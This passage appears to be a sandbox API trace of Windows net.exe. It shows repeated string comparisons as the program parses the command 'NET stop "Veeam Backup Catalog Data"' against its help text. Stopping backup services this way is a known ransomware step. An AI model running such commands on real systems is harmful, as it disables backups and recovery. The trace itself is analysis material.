lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START EVENTLOG\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START MESSENGER\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START NET LOGON\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x16 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x11 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START RPCSS\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START SCHEDULE\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x12 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START SERVER\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0xf [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START UPS\r\n", _MaxCount=0x25) returned 14 [0200.341] LocalFree (hMem=0x783fa0) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x17 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START WORKSTATION\r\n", _MaxCount=0x25) returned 14 [0200.341] LocalFree (hMem=0x783fa0) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x18 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x25) returned 14 [0200.341] LocalFree (hMem=0x783fa0) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x2a [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER", _MaxCount=0x25) returned 14 [0200.341] LocalFree (hMem=0x783fa0) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x25) returned 19 [0200.341] LocalFree (hMem=0x783fa0) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x58 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN", _MaxCount=0x25) returned -1 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x184 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET USE\r\n[devicename | *] [\\\\computer", _MaxCount=0x25) returned -2 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xc7 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET USER\r\n[username [password | *] [o", _MaxCount=0x25) returned -2 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x47 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | ", _MaxCount=0x25) returned -3 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xc2 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONF", _MaxCount=0x25) returned 19 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x319 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="SERVICES\r\nNET START can be used to st", _MaxCount=0x25) returned -5 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x483 [0200.341] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="SYNTAX\r\nThe following conventions are", _MaxCount=0x25) returned -5 [0200.341] LocalFree (hMem=0x785890) returned 0x0 [0200.341] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xa86 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NAMES\r\nThe following types of names a", _MaxCount=0x25) returned 4 [0200.342] LocalFree (hMem=0x785890) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x54 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="\r\nFor more information on tools see t", _MaxCount=0x25) returned 97 [0200.342] LocalFree (hMem=0x785890) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xad [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{min", _MaxCount=0x20) returned 18 [0200.342] LocalFree (hMem=0x785890) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x2e [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET COMPUTER\r\n\\\\computername {/A", _MaxCount=0x20) returned 16 [0200.342] LocalFree (hMem=0x783fa0) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x7d [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET CONFIG SERVER\r\n[/AUTODISCONN", _MaxCount=0x20) returned 16 [0200.342] LocalFree (hMem=0x785890) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x26 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET CONFIG\r\n[SERVER | WORKSTATIO", _MaxCount=0x20) returned 16 [0200.342] LocalFree (hMem=0x783fa0) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x20) returned 16 [0200.342] LocalFree (hMem=0x783fa0) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x1b [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x20) returned 13 [0200.342] LocalFree (hMem=0x783fa0) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0xbe [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET GROUP\r\n[groupname [/COMMENT:", _MaxCount=0x20) returned 12 [0200.342] LocalFree (hMem=0x785890) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x33 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET HELP\r\ncommand\r\n -or-\r\nNE", _MaxCount=0x20) returned 11 [0200.342] LocalFree (hMem=0x783fa0) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x20) returned 11 [0200.342] LocalFree (hMem=0x783fa0) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0xc1 [0200.342] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET LOCALGROUP\r\n[groupname [/COM", _MaxCount=0x20) returned 7 [0200.342] LocalFree (hMem=0x785890) returned 0x0 [0200.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x16 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x20) returned 3 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x33 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET SESSION\r\n[\\\\computername] [/", _MaxCount=0x20) returned 15 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x234 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x20) returned 12 [0200.343] LocalFree (hMem=0x785890) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x13 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START BROWSER\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START EVENTLOG\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START MESSENGER\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START NET LOGON\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x16 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x11 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START RPCSS\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START SCHEDULE\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x12 [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START SERVER\r\n", _MaxCount=0x20) returned 14 [0200.343] LocalFree (hMem=0x783fa0) returned 0x0 [0200.343] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0xf [0200.343] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START UPS\r\n", _MaxCount=0x20) returned 14 [0200.344] LocalFree (hMem=0x783fa0) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x17 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START WORKSTATION\r\n", _MaxCount=0x20) returned 14 [0200.344] LocalFree (hMem=0x783fa0) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x18 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x20) returned 14 [0200.344] LocalFree (hMem=0x783fa0) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x2a [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET STATISTICS\r\n[WORKSTATION | S", _MaxCount=0x20) returned 14 [0200.344] LocalFree (hMem=0x783fa0) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x20) returned 19 [0200.344] LocalFree (hMem=0x783fa0) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/㾠x/") returned 0x58 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET TIME\r\n\r\n[\\\\computername | /D", _MaxCount=0x20) returned -1 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0x184 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET USE\r\n[devicename | *] [\\\\com", _MaxCount=0x20) returned -2 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0xc7 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET USER\r\n[username [password | ", _MaxCount=0x20) returned -2 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0x47 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET VIEW\r\n[\\\\computername [/CACH", _MaxCount=0x20) returned -3 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0xc2 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NET\r\n [ ACCOUNTS | COMPUTER |", _MaxCount=0x20) returned 19 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0x319 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="SERVICES\r\nNET START can be used ", _MaxCount=0x20) returned -5 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0x483 [0200.344] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="SYNTAX\r\nThe following convention", _MaxCount=0x20) returned -5 [0200.344] LocalFree (hMem=0x787890) returned 0x0 [0200.344] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0xa86 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="NAMES\r\nThe following types of na", _MaxCount=0x20) returned 4 [0200.345] LocalFree (hMem=0x787890) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0x54 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog", _String2="\r\nFor more information on tools ", _MaxCount=0x20) returned 97 [0200.345] LocalFree (hMem=0x787890) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/碐x/") returned 0xad [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET ACCOUNTS\r\n[/FORCELOG", _MaxCount=0x18) returned 18 [0200.345] LocalFree (hMem=0x787890) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/碐x/") returned 0x2e [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET COMPUTER\r\n\\\\computer", _MaxCount=0x18) returned 16 [0200.345] LocalFree (hMem=0x783fa0) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/㾠x/") returned 0x7d [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET CONFIG SERVER\r\n[/AUT", _MaxCount=0x18) returned 16 [0200.345] LocalFree (hMem=0x787890) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/碐x/") returned 0x26 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET CONFIG\r\n[SERVER | WO", _MaxCount=0x18) returned 16 [0200.345] LocalFree (hMem=0x783fa0) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET CONTINUE\r\nservice\r\n\r", _MaxCount=0x18) returned 16 [0200.345] LocalFree (hMem=0x783fa0) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, 